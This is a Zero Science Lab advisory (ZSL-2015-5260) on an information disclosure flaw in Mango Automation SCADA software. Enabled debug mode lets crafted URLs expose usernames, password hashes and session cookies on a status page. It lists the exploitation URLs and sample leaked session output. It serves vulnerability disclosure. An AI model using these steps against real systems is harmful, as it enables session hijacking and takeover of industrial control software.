Mango Automation version 2.6.0 suffers from an information disclosure vulnerability because it contains default configuration for debugging enabled in the '/WEB-INF./web.xml' file (debug=true). An attacker can entice a logged-in user to visit a specially crafted URL which will produce a system exception with stack trace on the Jetty server. When this error occurs, the debug option generates a status page with all the information from the visitor, meaning that the attacker is able to see usernames, password hashes, e-mails and of course, Cookie sessions). Using the generated error, the attacker can easily perform session hijacking and take over the system using previously discovered vulnerabilities by just visiting the status page non-authenticated.
1fbd54960e1a8376a34addc2eda82c308365f46b97f014b96b16a22e077651c6
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability
Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)
Summary: Mango Automation is a flexible SCADA, HMI
And Automation software application that allows you
to view, log, graph, animate, alarm, and report on
data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.
Desc: Mango Automation suffers from information disclosure
vulnerability because it contains default configuration for
debugging enabled in the '/WEB-INF./web.xml' file (debug=true).
An attacker can entice a logged-in user to visit a specially
crafted URL which will produce a system exception with stack
trace on the Jetty server. When this error occurs, the debug
option generates a status page with all the information from
the visitor, meaning that the attacker is able to see usernames,
password hashes, e-mails and of course, Cookie sessions). Using
the generated error, the attacker can easily perform session
hijacking and take over the system using previously discovered
vulnerabilities by just visiting the status page non-authenticated.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Jetty(9.2.2.v20140723)
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php
20.08.2015
--
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):
- http://localhost:8080/status/
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:
- http://localhost/status/mango.json?time=$
- http://localhost/status/
Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n
Also you can list all of the Classes known to DWR:
- http://localhost:8080/dwr/index.html